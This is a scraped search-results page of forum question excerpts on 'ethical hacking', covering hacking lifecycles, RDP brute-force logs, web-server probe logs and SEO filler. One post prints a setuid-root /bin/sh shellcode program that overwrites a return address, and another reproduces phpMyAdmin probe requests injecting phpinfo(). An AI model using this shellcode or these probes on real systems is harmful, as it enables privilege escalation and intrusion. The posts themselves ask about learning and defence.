Search Results

Search found 707 results on 29 pages for 'ethical hacking'.

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

Page 1/29 | 1 2 3 4 5 6 7 8 9 10 11 12  | Next Page >

  • Software Life-cycle of Hacking

    - by David Kaczynski
    At my local university, there is a small student computing club of about 20 students. The club has several small teams with specific areas of focus, such as mobile development, robotics, game development, and hacking / security. I am introducing some basic agile development concepts to a couple of the teams, such as user stories, estimating complexity of tasks, and continuous integration for version control and automated builds/testing. I am familiar with some basic development life-cycles, such as waterfall, spiral, RUP, agile, etc., but I am wondering if there is such a thing as a software development life-cycle for hacking / breaching security. Surely, hackers are writing computer code, but what is the life-cycle of that code? I don't think that they would be too concerned with maintenance, as once the breach has been found and patched, the code that exploited that breach is useless. I imagine the life-cycle would be something like: Find gap in security Exploit gap in security Procure payload Utilize payload I propose the following questions: What kind of formal definitions (if any) are there for the development life-cycle of software when the purpose of the product is to breach security?

    Read the article

  • Are these hacking attempts or something less sinister?

    - by Darkcat Studios
    I just had a look through our web server error logs, and Terminal services is reporting: "Remote session from client name a exceeded the maximum allowed failed logon attempts. The session was forcibly terminated." Hundreds of times, every 10.5 seconds or so for a period of about 5-10 minutes, once at 2pm yesterday and once again at about 1am this morning. We CURRENTLY have RDP open to the outside, as I am just completing the setup and now and then I/Others need to jump on from an outside office/location (VPN isn't an option) As these are so regular, am I right in assuming that they may be the result of some sort of dictionary attack? or could something like an internal admin's hung session cause such a mass of events? (Win Server 2008 R2)

    Read the article

  • (200 ok) ACCEPTED - Is this a hacking attempt?

    - by Byran
    I assume this is some type of hacking attempt. I've try to Google it but all I get are sites that look like they have been exploited already. I'm seeing requests to one of my pages that looks like this. /listMessages.asp?page=8&catid=5+%28200+ok%29+ACCEPTED The '(200 ok) ACCEPTED' is what is odd. But it does not appear to do anything. I'm running on IIS 5 and ASP 3.0. Is this "hack" meant for some other type of web server?

    Read the article

  • Hacking prevention, forensics, auditing and counter measures.

    - by tmow
    Recently (but it is also a recurrent question) we saw 3 interesting threads about hacking and security: My server's been hacked EMERGENCY. Finding how a hacked server was hacked File permissions question The last one isn't directly related, but it highlights how easy it is to mess up with a web server administration. As there are several things, that can be done, before something bad happens, I'd like to have your suggestions in terms of good practices to limit backside effects of an attack and how to react in the sad case will happen. It's not just a matter of securing the server and the code but also of auditing, logging and counter measures. Do you have any good practices list or do you prefer to rely on software or on experts that continuously analyze your web server(s) (or nothing at all)? If yes, can you share your list and your ideas/opinions?

    Read the article

  • should i bother to block these- rather lame attempt at hacking my server

    - by The Journeyman geek
    I'm running a LAMP stack, with no phpmyadmin (yes) installed. While poking through my apache server longs i noticed things like. 74.208.75.29 - - [16/Mar/2010:02:53:45 +0800] "POST http://74.208.75.29:6667/ HTTP/1.0" 404 481 "-" "-" 74.208.75.29 - - [16/Mar/2010:02:53:45 +0800] "CONNECT 74.208.75.29:6667 HTTP/1.0" 405 547 "-" "-" 66.184.178.58 - - [16/Mar/2010:13:27:59 +0800] "GET / HTTP/1.1" 200 1170 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 200.78.247.148 - - [16/Mar/2010:15:26:05 +0800] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 506 "-" "-" 206.47.160.224 - - [16/Mar/2010:17:27:57 +0800] "GET / HTTP/1.1" 200 1170 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 190.220.14.195 - - [17/Mar/2010:01:28:02 +0800] "GET //phpmyadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 480 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 190.220.14.195 - - [17/Mar/2010:01:28:03 +0800] "GET //pma/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 476 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 190.220.14.195 - - [17/Mar/2010:01:28:04 +0800] "GET //admin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 478 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 190.220.14.195 - - [17/Mar/2010:01:28:05 +0800] "GET //dbadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 479 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 190.220.14.195 - - [17/Mar/2010:01:28:05 +0800] "GET //mysql/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 479 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 190.220.14.195 - - [17/Mar/2010:01:28:06 +0800] "GET //php-my-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 482 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" What exactly is happening? is it a really lame attempt at hacking in? Should i bother blocking the ip addresses these are from, or just leave it?

    Read the article

  • Is it worth hiring a hacker to perform some penetration testing on my servers ?

    - by Brann
    I'm working in a small IT company with paranoid clients, so security has always been an important consideration to us ; In the past, we've already mandated two penetration testing from independent companies specialized in this area (Dionach and GSS). We've also ran some automated penetration tests using Nessus. Those two auditors were given a lot of insider information, and found almost nothing* ... While it feels comfortable to think our system is perfectly sure (and it was surely comfortable to show those reports to our clients when they performed their due diligence work), I've got a hard time believing that we've achieved a perfectly sure system, especially considering that we have no security specialist in our company (Security has always been a concern, and we're completely paranoid, which helps, but that's far as it goes!) If hackers can hack into companies that probably employ at least a few people whose sole task is to ensure their data stays private, surely they could hack into our small business, right ? Does someone have any experience in hiring an "ethical hacker"? How to find one? How much would it cost? *The only recommendation they made us was to upgrade our remote desktop protocols on two windows servers, which they were able to access because we gave them the correct non-standard port and whitelisted their IP

    Read the article

  • I have this code .... Ethical Hacking

    - by kmitnick
    hello folks, I am following this EBook about Ethical Hacking, and I reached the Linux Exploit Chapter, this is the code with Aleph's 1 code. //shellcode.c char shellcode[] = //setuid(0) & Aleph1's famous shellcode, see ref. "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" //setuid(0) first "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int main() { //main function int *ret; //ret pointer for manipulating saved return. ret = (int *)&ret + 2; //setret to point to the saved return //value on the stack. (*ret) = (int)shellcode; //change the saved return value to the //address of the shellcode, so it executes. } I give this the super user privileges, with chmod u+s shellcode as a super user, then go back to normal user with su - normal_user but when I run ./shellcode I should be a root user but instead I still be normal_user so any help?? btw I am working on BT4-Final, I turned off the ASLR, and running BT4 in VMWare...

    Read the article

  • What ethical problems realistically arise in programming?

    - by Fishtoaster
    When I co-oped during college, I had to fill out an evaluation of the co-op afterwards. One metric I always had to rate was how much the company required me to "Make ethical decisions related to your profession." This always seemed kinda silly- I mean, my first co-op was writing java apps to manage industrial radios. There wasn't much moral ambiguity going on. Anyway, I'm wonder what sort of ethical dilemmas one might actually encounter in software development. Edit: It should be noted that no ethically-trained software engineer would ever consent to write a DestroyBaghdad procedure. Basic professional ethics would require him to write a DestroyCity procedure, to which Baghdad could be given as a parameter. - Nathanial Borenstein

    Read the article

  • Handle URI hacking gracefully in ASP.NET

    - by asbjornu
    I've written an application that handles most exceptions gracefully, with the page's design intact and a pretty error message. My application catches them all in the Page_Error event and there adds the exception to HttpContext.Curent.Context.Items and then does a Server.Transfer to an Error.aspx page. I find this to be the only viable solution in ASP.NET as there seems to be no other way to do it in a centralized and generic manner. I also handle the Application_Error and there I do some inspection on the exception that occurred to find out if I can handle it gracefully or not. Exceptions I've found I can handle gracefully are such that are thrown after someone hacking the URI to contain characters the .NET framework considers dangerous or basically just illegal at the file system level. Such URIs can look like e.g.: http://exmample.com/"illegal" http://example.com/illegal"/ http://example.com/illegal / (notice the space before the slash at the end of the last URI). I'd like these URIs to respond with a "404 Not Found" and a friendly message as well as not causing any error report to be sent to avoid DDOS attack vectors and such. I have, however, not found an elegant way to catch these types of errors. What I do now is inspect the exception.TargetSite.Name property, and if it's equal to CheckInvalidPathChars, ValidatePath or CheckSuspiciousPhysicalPath, I consider it a "path validation exception" and respond with a 404. This seems like a hack, though. First, the list of method names is probably not complete in any way and second, there's the possibility that these method names gets replaced or renamed down the line which will cause my code to break. Does anyone have an idea how I can handle this less hard-coded and much more future-proof way? PS: I'm using System.Web.Routing in my application to have clean and sensible URIs, if that is of any importance to any given solution.

    Read the article

  • Attributes of an Ethical Programmer?

    - by ahmed
    Software that we write has ramifications in the real world. If not, it wouldn't be very useful. Thus, it has the potential to sweep across the world faster than a deadly manmade virus or to affect society every bit as much as genetic manipulation. Maybe we can't see how right now, but in the future our code will have ever-greater potential for harm or good. Of course, there's the issue of hacking. That's clearly a crime. Or is it that clear? Isn't hacking acceptable for our government in the event of national security? What about for other governments? Cases of life-and-death emergency? Tracking down deadbeat parents? Screening the genetic profile of job candidates? Where is the line drawn? Who decides? Do programmers have responsibility for how their code is used? What if a programmer writes code to pry into confidential information or copy-protected material? Does he bear responsibility along with the person who used the program? What about a programmer who knowingly or unknowingly writes code to "fix the books?" Should he be liable?

    Read the article

  • Hacking your own application

    - by instigator
    I am a web developer that is very conscious of security and try and make my web applications as secure as possible. How ever I have started writing my own windows applications in C# and when it comes testing the security of my C# application, I am really only a novice. Just wondering if anyone has any good tutorials/readme's on how to hack your own windows application and writing secure code.

    Read the article

  • piece of php code for prevent hacking.

    - by artmania
    Hi friends, I have a php file at my site, and I connect to db, get some records and list them in same file. mysql_connect("localhost", "blabla", "blabla") or die(mysql_error()); mysql_select_db("blabla") or die(mysql_error()); $blabla1 = mysql_query("SELECT * FROM gallery WHERE id_cat=1"); $blabla2 = mysql_query("SELECT * FROM gallery WHERE id_cat=2"); $blabla3 = mysql_query("SELECT * FROM gallery WHERE id_cat=3"); So, is there anything I need to do for security? :/ like sql-injection or anything else. there is nothing going to url. it is just www.blabla.com/gallery.php appreciate advises!!! thanks a lot!

    Read the article

  • Les développeurs amateurs se mettent aux hacking avec la prolifération des kits de piratage « tout-e

    Mise à jour du 29/04/10 Les développeurs amateurs se mettent aux hacking Avec la prolifération des kits de piratage « tout en un », mais ils restent très professionnels Les kits de hacking « do-it-yourself » (en vf « faîtes le vous même ») se propageraient à grande vitesse. Ces solutions « tout en un » facilitent en effet la création et l'utilisation de malwares (un constat également fait par Microsoft dans son rapport semestriel de sécurité - lire ci-avant). Leurs prix relativement bas aura fait le reste pour leur démocratisation auprès de tous les développeurs malveillants, y compris les moins doués. Dans son étude, M8...

    Read the article

  • Mythbusters- Programming/hacking myths [closed]

    - by stephen776
    Hey guys. I am a big fan of the Discovery show Mythbusters, as Im sure some of you are as well. I have always wanted them to do an episode on programming/hacking. They get a lot of their show ideas from fans so I though we could compile a list of possible myths to bust. Lets hear your ideas! (sorry if this is not appropriate, close if necessary) Edit: I am not necessarily looking for subjective "This is what I want to see" answers. I am talking more along the lines of interesting computer/programming/hacking stories that would appeal to a general audience. I do not expect them to do a show on "Whats faster i++ or i + 1".

    Read the article

  • Ethical White Hat SEO Services

    SEO is such a vast amalgamation of features that professionals regularly working on this process have found out loopholes through which results can be manipulated. These unfair and malpractices have resulted in the credibility of the process taking a beating and has also given critics and SEO bashers a chance to level the most outrageous and preposterous allegations against it and its efficacy.

    Read the article

  • Website Design and Ethical SEO

    There are a host of website design and SEO companies in Chicago. SEO consists of services of consultation, tailor made changes to the owner's website, analysis of keywords and market research, website hosting on high speed servers, on page and off page SEO, email marketing, a matching blog, using Webmaster 2.0, Google analytics setup that distinguishes which of the client's ads are most effective and disposes of the rest thus cutting expenses, and SEM (Search Engine Marketing) like pay per click management and usage of Google Ad words is all a part of website design in Chicago.

    Read the article

  • 7 Ethical SEO Strategies

    Back when the concept of the internet was still new, many of its users abused it. They made millions of dollars just scamming people off their precious savings. They posted things that others have made and made themselves look legitimate.

    Read the article

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

1 2 3 4 5 6 7 8 9 10 11 12  | Next Page >